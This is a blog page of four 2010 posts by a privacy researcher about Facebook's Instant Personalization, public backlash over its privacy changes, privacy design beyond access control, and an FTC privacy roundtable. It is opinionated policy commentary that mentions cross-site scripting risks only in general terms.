Posts tagged ‘facebook’

Facebook’s Instant Personalization: An Analysis of Fundamental Privacy Flaws

Facebook has begun to accelerate the web-wide roll-out of the Instant Personalization program. The number of partner websites recently jumped from three to five, and a partnership with early stage venture firm YCombinator is set to greatly expand that number in the coming months.[1]

Instant Personalization allows a partner website to automatically learn the identity of a visitor (as well as some data about them) without any explicit user action, provided that the visitor is a logged-in Facebook user. It is probably the most privacy-intrusive change introduced by the company this year, and could lead to a profound change in how the web works and is perceived.

Facebook’s superficially reassuring line is that only data that is already public is shared with partner sites. Even ignoring the fact that it is hard for users to figure out exactly what data is public, and is only getting harder, I find the official explanation to be a red herring. In this article I will examine the various fundamental flaws of Instant Personalization.

1. Sneakiness. All the information transmitted via Instant Personalization is available via Facebook connect; the sole purpose of Instant Personalization is to eliminate the element of user authorization from the process. Thus, I find the very raison d’etre to be questionable. If a user declines to use Facebook connect, perhaps they had a good reason for doing so. Think about a porn site — I don’t think I need to elaborate.

2. Identity. To me, what is much more worrisome than third parties getting your data is third parties getting your identity when you browse. The idea that a website knows who you are as soon as you land on it is inherently creepy because it violates users’ mental model of how the web works. The cumulative effect is worse — people are intensely uncomfortable when they feel they are being “followed around” as they browse the web.

From a technical perspective, an Instant Personalization partner could itself turn around and become an Instant Personalization provider, and so could any website that this partner provided Instant Personalization services for, ad infinitum. This is because any number of tracking devices (invisible iframes) can be nested within a page.

Implementation bugs on partner sites also have the effect of leaking your identity to other parties. In my ubercookies series, I documented a series of bugs that can be exploited by an arbitrary website to learn the visitor’s identity. All of these apply to Instant Personalization, i.e., if any one of the partner websites has such a bug, that can be exploited by an arbitrary attacker to instantly de-anonymize a visitor to his site. Security researcher theharmonyguy has a great post on cross-site scripting vulnerabilities on both Rotten Tomatoes and Scribd that compromise Instant Personalization in this fashion.[2]

3. Facebook gets your clickstream. Instant Personalization is a two way street: while the partner site gets access to the user’s identity, Facebook learns the URLs of the pages the user visits. In a world where Instant Personalization is widely deployed, Facebook will be able to monitor a large fraction, perhaps the majority, of clicks that you make around the web.

While troubling, this is not unprecedented: the Faceook like button constitutes a very similar privacy problem — Facebook sees you whenever you visit any page with the like button (or another social plugin) installed, even if you don’t click the like button.[3] Facebook bowed to pressure from privacy advocates and agreed to delete the logs from social plugins after 90 days; I would like to see the same policy applied to Instant Personalization logs as well.

4. Third parties could get your clickstream. Normally, an Instant Personalization partner can only see your clicks on their own site. However, think of an Instant Personalization partner whose product is a social widget or an analytics plugin that is intended to be installed on many client sites. From a technical perspective, loading a page or widget in an iframe is not fundamentally different from visiting the site directly. That means it is feasible for an Instant Personalization partner with a social widget to monitor your clicks — tied to your real identity, of course — on all sites with the widget installed.[4]

5. Lack of enforcement. So far I have described the lack of technological barriers to various types of misuse and abuse of Instant Personalization. However, Facebook contractually prohibits partners from misusing the data. The natural question is whether this is effective.

It is too early to tell yet, because there are currently only five partners. To predict how things will turn out once numerous startups — without the resources or incentive for security testing and privacy compliance — get on board, we can look to the track-record of Facebook’s third party application platform. As you may recall, this has been rather poor, with enforcement of Terms of Service violations being haphazard at best.

Mitigation. In my opinion these flaws are inherent, and I don’t think Instant Personalization will turn out well from a security and privacy perspective. User expectations are not malleable, cross-site scripting bugs will always exist, there will soon be too many partner sites to monitor closely, and some of them will look for ways to push the boundaries of what they can do.

However, there are two things Facebook can do to mitigate the extent of the damage. The first is to make public both the technical specification and the Terms of Use of the Instant Personalization program, so that there can be some independent monitoring of bugs and policy violations. The second is to commit resources to ToS enforcement — Facebook needs to signal that their enforcement efforts have some teeth, and that there will be penalties for partners with buggy sites or noncompliant data use practices.

Footnotes.
[1] YCombinator-funded companies will get “priority access” to various Facebook technologies including “Facebook Credits, Instant Personalization and upcoming beta features”. Interestingly, Instant Personalization seems to be the feature that YCombinator is most interested in.

[2] Yelp.com was also found vulnerable to a cross-site scripting bug soon after Instant Personalization launch. This means the majority of partner sites — 3 out of 5 — have had vulnerabilities that compromise Instant Personalization.

[3] In Instant Personalization, Facebook and the partner site communicate invisibly in the background each time the user visits a page on the partner site; in this way the mechanism is different from social widgets.

[4] Large-scale clickstream data is prone to misuse in various ways: government coercion, hacking, or being purchased as part of bankruptcy settlements (expecially when we’re talking about startups).

Thanks to Kevin Bankston for pointing me to Facebook’s log rentention policy for social plugins.

To stay on top of future posts, subscribe to the RSS feed or follow me on Twitter.

September 28, 2010 at 3:21 pm 6 comments

Facebook, Privacy, Public Opinion and Pitchforks

As just about everyone is already aware, Facebook has been up to a bunch of big brotherly stuff lately, including “instant personalization” — making your identity and data available to 3rd party sites you visit, arguing to treat ToS violations as criminal violations, and forcing you to make your “interests” public (or delete them). Overall, it looks like they’re making a bold move to take control of everyone’s identity and connections, privacy be damned.

The entirely predictable effect of this has been that everything the company now does is being viewed with extreme suspicion. The pitchforks have been sharpened, and the mob gets set off on almost any excuse. In the last week, one somewhat questionable feature, one minor bug and one utter non-event have each been reported as sinister privacy disasters:
  1. The questionable feature was linking your statuses to “connections” pages. The outrage was based on the meme “if your status contains the word FBI then the FBI will have a record of it,” which appears to have started here. That article is full of hyperbole and understandably appears to have been widely misunderstood to be claiming that even private statuses appear on Connection pages (they don’t). There’s really nothing new in terms of the visibility of your statuses: Facebook already had real-time search for public statuses, and the only difference is that someone can now click on the “FBI” page instead of having to type in “FBI” into the search box.
  2. The minor bug was that Facebook started listing Connect-enabled websites you visit in the “Applications” tab in your privacy settings. The sites didn’t get your identity, any of your data, nor did they have priveleges to post to your wall. The fact that you visited them was not visible to anyone else. No actual harm was done. And yet an article titled Facebook’s new features secretly add apps to your profile alleged all of these things without making any real effort to check with Facebook. Facebook quickly fixed the bug and contacted the authors, and they updated the story, but it did little to quell the rumors which took on a life of their own.
  3. The non-issue was Facebook leaking your IP address in email notifications. This is normal behavior: most webmail providers, except gmail, put the sender’s IP into the message header as a spam-prevention technique. This kicked up another shitstorm.

In spite of these unfair accusations, it is hard for me to feel any sympathy for the beleaguered company. This is how public opinion works, and they can’t claim not to have seen it coming. As this fantastic visualization by Matt McKeon shows, Facebook has been on a long and consistent path to make all of your information public, essentially pulling a giant bait-and-switch on their users. They stepped up the pace recently, asked their users to give up too much too fast, and something just snapped.

I think Facebook underestimated the extent to which privacy correlates with trust. They were forgiven for Beacon and other problems in the past, but after the most recent series of privacy violations, it became clear that these were not missteps but deliberate actions. I believe that Facebook’s relationship with its users has changed fundamentally, and isn’t going to mend any time soon. Perhaps Facebook’s reckoning is that they are now big enough that it doesn’t matter any more. That remains to be seen.

On a personal note, someone pretty high up at Facebook emailed me a couple of months ago (although “not in an official capacity”) to have a discussion about privacy issues with some of their upcoming product launches. Unfortunately I was traveling at the time, and when I got back they were no longer interested. I guess by then it was too close to f8 and all the important decisions had been made. I can’t help wondering if the outcome might have been different if I’d been able to meet with them — perhaps they might have eased off just a little bit on their world-domination plans and avoided the straw that broke the camel’s back. But I suspect that that’s just wishful thinking, given that the imperative for their current push in all likelihood came from the very top.

To stay on top of future posts, subscribe to the RSS feed or follow me on Twitter.

May 10, 2010 at 7:02 pm 5 comments

Privacy is not Access Control (But then what is it?)

In my previous article on the Google Buzz fiasco, I pointed out that the privacy problems were exacerbated by the fact that the user interface was created by programmers. In this post I will elaborate on that theme and provide some constructive advice on privacy-conscious design, especially for social networking.

The problem I’m addressing is that as far as computer scientists and computer programmers are concerned, privacy is a question of access control, i.e., who is allowed to look at what. Unfortunately, in the real world, that is only a tiny part of what privacy is about. Here are three examples to make my point:

1. Dummy cameras. Consider a thought experiment: suppose the government installed a bunch of cameras all over a public park along with prominent signs announcing 24×7 surveillance. The catch, however, is that the cameras have not been turned on. Has anyone’s privacy been violated?

From the computer science perspective, the answer is no, because no one is actually being observed, nothing is being recorded and no data is being generated. But common sense tells us that something is wrong with that answer. The cameras cause people considerable discomfort. The surveillance, real or imaginary, changes their behavior.

This hypothetical scenario is adapted from Ryan Calo’s paper, which analyzes in detail the “sensation of being observed.”

2. Aggregation changes the equation. Remember the uproar when Facebook released News Feed? No new information was revealed to your friends that wasn’t accessible to them before; it was just that the News Feed made it dramatically easier to observe all your activities on the site.

Of course, it goes both ways: the technology in turn changed people’s expectations; it is now hard to imagine not having a feed-like system, whether on Facebook or another social network. Nevertheless, I often see people putting something into their profile, deciding a few moments later that they didn’t want to share it after all, and realizing that it was too late because the information has already been broadcast to their friends.

3. Everyone-but-X access control, which I described in an earlier article, shows in a direct way how access control fails to capture privacy requirements. From the traditional CS security perspective, the ability for a user to make something visible to “everyone but X” is meaningless: X can always create a fake account to get around it.

But a use-case should hopefully immediately convince you that everyone-but-X is a good idea: your sibling is on your friends list and you want to post about your sex life. It’s not that you want to prevent X from having access to your post, but rather that both of you prefer that X didn’t have access to it.

Access control is not the goal of privacy design. It is at best one of many tools. Rather, human behavior is key. The dummy cameras were bad because they affected the behavior of people in a detrimental way. News feed was bad because it introduced major new privacy consequences for the behaviors that people were accustomed to on the site. (However, I would argue that the dramatic increase in usefulness trumped the privacy drawbacks.) Everyone-but-X privacy is good because it allows people to carry over to the online setting behaviors that they are used to in the real world.

It is impossible to fully analyze the privacy consequences of a design decision without studying its impact on actual user behavior. There is no theoretical framework to ensure that a design decision is safe — user testing is essential. Going back to Google Buzz, a beta period or a more gradually phased roll-out would have undoubtedly been better.

To stay on top of future posts, subscribe to the RSS feed or follow me on Twitter.

February 13, 2010 at 3:03 am 10 comments

In which I come out: Notes from the FTC Privacy Roundtable

I was on a panel at the second FTC privacy roundtable in Berkeley on Thursday. Meeting a new community of people is always a fascinating experience. As a computer scientist, I’m used to showing up to conferences in jeans and a T-shirt; instead I found myself dressing formally and saying things like “oh, not at all, the honor is all mine!”

This post will also be the start of a new direction for this blog. So far, I’ve mostly confined myself to “doing the math” and limiting myself to factual exposition. That’s going to change, for two reasons:

  • The central theme of this blog and of my Ph.D dissertation — the failure of data anonymization — now seems to be widely accepted in policy circles. This is due in large part to Paul Ohm’s excellent paper, which is a must-read for anyone interested in this topic. I no longer have to worry about the acceptance of the technical idea being “tainted” by my opinions.
  • I’ve been learning about the various facets of privacy — legal, economic, etc. — for long enough to feel confident in my views. I have something to contribute to the larger discussion of where technological society is heading with respect to privacy.

Underrepresentation of scientists

Living up to the stereotype

As it turned out, I was the only academic computer scientist among the 35 panelists. I found this very surprising. The underrepresentation is not because computer scientists have nothing to contribute — after all, there were other CS Ph.Ds from industry groups like Mozilla. Rather, I believe it is a consequence of the general attitude of academic scientists towards policy issues. Most researchers consider it not worth their time, and a few actively disdain it.

The problem is even deeper: academics have the same disdainful attitude towards the popular exposition of science. The underlying reason is that the goal in academia is to impress one’s peers; making the world better is merely a side-effect, albeit a common one. The incentive structure in academia needs to change. I will pick up this topic in future posts.

The FTC has an admirable approach to regulation

As I found out in the course of the day’s panels, the FTC is not about prescribing or mandating what to do. Pushing a specific privacy-enhancing technology isn’t the kind of thing they are interested in doing at all. Rather, they see their role as getting the market to function better and the industry to self-regulate. The need to avoid harming innovation was repeatedly emphasized, and there was a lot of talk about not throwing the baby out with the bathwater.

The following were the potential (non baby hurting) initiatives that were most talked about:

  • Market transparency. Markets can only work well when there is full information, and when it comes to privacy the market has failed horribly. Users have no idea what happens to their data once it’s collected, and no one reads privacy policies. Regulation that promotes transparency can help the market fix itself.
  • Consumer education. This is a counterpart to the previous point. Education about privacy dangers as well as privacy technologies can help.
  • Enforcement. A few bad apples have been responsible for the most egregious privacy SNAFUs. The larger players are by and large self-regulating. The FTC needs to work with law enforcement to punish the offenders.
  • Carrots and sticks. Even the specter of regulation, corporate representatives said, is enough to get the industry to self-regulate. Many would disagree, but I think a carrots-and-sticks approach can be made to work.
  • Incentivizing adoption of PETs (privacy enhancing technologies) in general. The question of how the FTC can spur the adoption of PETs was brought up on almost every panel, but I don’t think there were any halfway convincing answers. Someone mentioned that the government in general could go into the market for PETs, which seems reasonable.

As a libertarian, I think the overall non-interventionist approach here is exactly right. I’m told that the FTC is rather unusual among US regulatory agencies in this regard (which makes sense, considering that the FCC, for example, spends its time protecting children from breasts when it is not making up lists of words.)

Facebook’s two faces

Facebook public policy director Tim Sparapani, who was previously with the ACLU, made a variety of comments on the second panel that were bizarre, to put it mildly. Take a look (my comments are in sub-bullets):

  • “We absolutely compete on privacy.”
    • That’s a weird definition of “compete.” Facebook has a history of rolling out privacy-infringing updates, such as Beacon, the ToS changes, and the recent update that made the graph public. Then they wait to see if there’s an outcry and roll back some of the changes. It is hard to think of another company has had such a cavalier approach.
  • “There are absolutely no barriers to entry to create a new social network.”
    • Except for that little thing called the network effect, which is the mother of all barriers to entry. In a later post I will analyze why Facebook has reached a critical level of penetration in most markets which makes it nearly unassailable as a  general-purpose social network.
  • “Our users have learned to trust us.”
    • I don’t even know what to say about this one.
  • “We are a walled garden.”
    • Sparapani is confusing two different senses of “walled garden” here. This was said in response to a statement by the Google rep about Google’s features to let users migrate their data to other services (which I find very commendable). In this sense, Facebook is indeed a walled garden, and doesn’t allow migration, which is a bad thing.  But Sparapani said he meant it in the sense that Facebook doesn’t sell user data wholesale to other companies. That sounds like good news, except that third party app developers end up sharing user data with other entities, because enforcement of the application developer Terms of Service is virtually non-existent.
  • “If you delete the data it’s gone.” (in the context of deleting your account)
    • That might be true in a strict sense, but it is misleading. Deleting all your data is actually impossible to achieve because most pieces of data belong to more than one user. Each of your messages will live on in the other person’s inbox (and it would be improper to delete it from theirs). Similarly, photos in which you appear, which you would probably like gone when you delete your account, still live on in the album of whoever took the picture. The same goes for your pokes, likes and other multi-user interactions. These are the very things that make a social network social.
  • “We now have controls on privacy at the moment you share data. This is an extraordinary innovation and our engineers are really proud of it.”
    • The first part of that statement is true: you can now change the privacy controls on each of your Facebook status messages independently. The second part is downright absurd. It is completely trivial to implement from an engineering perspective (and LiveJournal for instance has had it for a decade).

There were more absurd statements, but you get the picture. It’s not just the fact that Sparapani’s comments were unhinged from reality that bothers me — the general tone was belligerent and disturbing. I missed a few minutes of the panel, during which he apparently he responded to a criticism from Chris Conley of the ACLU by saying “I was at the ACLU longer than you’ve been there.” This is unprofessional, undignified and a non-answer. Amusingly, he claimed that Facebook was “very proud” of various aspects of their privacy track record at least half a dozen times in the course of the panel.

Contrast all this with Mark Zuckerberg’s comments in an interview with Michael Arrington, which can be summed up as “the age of privacy is over.” That article goes on to say that Facebook’s actions caused the shift in social norms (to the extent that they have shifted at all) rather than merely responding to them. Either way, it is unquestionable that Facebook’s true behavior at the present time pays lip service to privacy, and Zuckerberg’s statement is a more-or-less honest reflection of that. On the other hand, as I have shown, the company sings a completely different tune when the FTC is listening.

Engaging privacy skeptics

Aside from Facebook’s shenanigans, I feel that that there are two groups in the privacy debate who are talking past each other. One side is represented by consumer advocates, and is largely echoed by the official position of the FTC. The other side’s position can be summed up as “yeah, whatever.” When expressed coherently, there are three tenets of this position (with the caveats that not all privacy skeptics adhere to all three):

  • Users don’t care about privacy any more
  • Even if they do, privacy is impossible to achieve in the digital age, so get over it
  • There are no real harms arising from privacy breaches.

Click image to embiggen

To  the right is an illustrative example of a mainstream-media representative who was at the workshop covering it on Twitter through the lens of his preconceived prejudices.

Privacy scholars never engage with the skeptics because the skeptical viewpoint appears obviously false to anyone who has done some serious thinking about privacy. However, it is crucial to engage the opponents, because 1. the skeptical view is extremely common 2. many of the startups coming out of the valley fall into this group, and they are are going to have control over increasing amounts of user data in the years to come.

The “privacy is dead” view was most famously voiced by Scott McNealy. In its extreme form it is easy to argue against: “start streaming yourself live on the Internet 24/7, and then we’ll talk.” (To be sure, a few people did this 10 years ago as a publicity stunt, but it is obvious that the vast majority of people aren’t ready for this level of invasiveness of monitoring/data collection.) But engaging with skeptics isn’t about refutation, it’s about dealing with a different way of thinking and getting the message across to the other side. Unfortunately real engagement hasn’t really been happening.

I have a double life in academia and the startup world, and I think this puts me in a somewhat unusual position of being able to appreciate both sides of the argument. My own viewpoint is somewhere in the middle; I will expand on this theme in future blog posts.

January 31, 2010 at 3:49 am 13 comments


About 33bits.org

I’m an associate professor of computer science at Princeton. I research (and teach) information privacy and security, and moonlight in technology policy.

This is a blog about my research on breaking data anonymization, and more broadly about information privacy, law and policy.

For an explanation of the blog title and more info, see the About page.

Me, elsewhere

Enter your email address to subscribe to this blog and receive notifications of new posts by email.

Join 266 other subscribers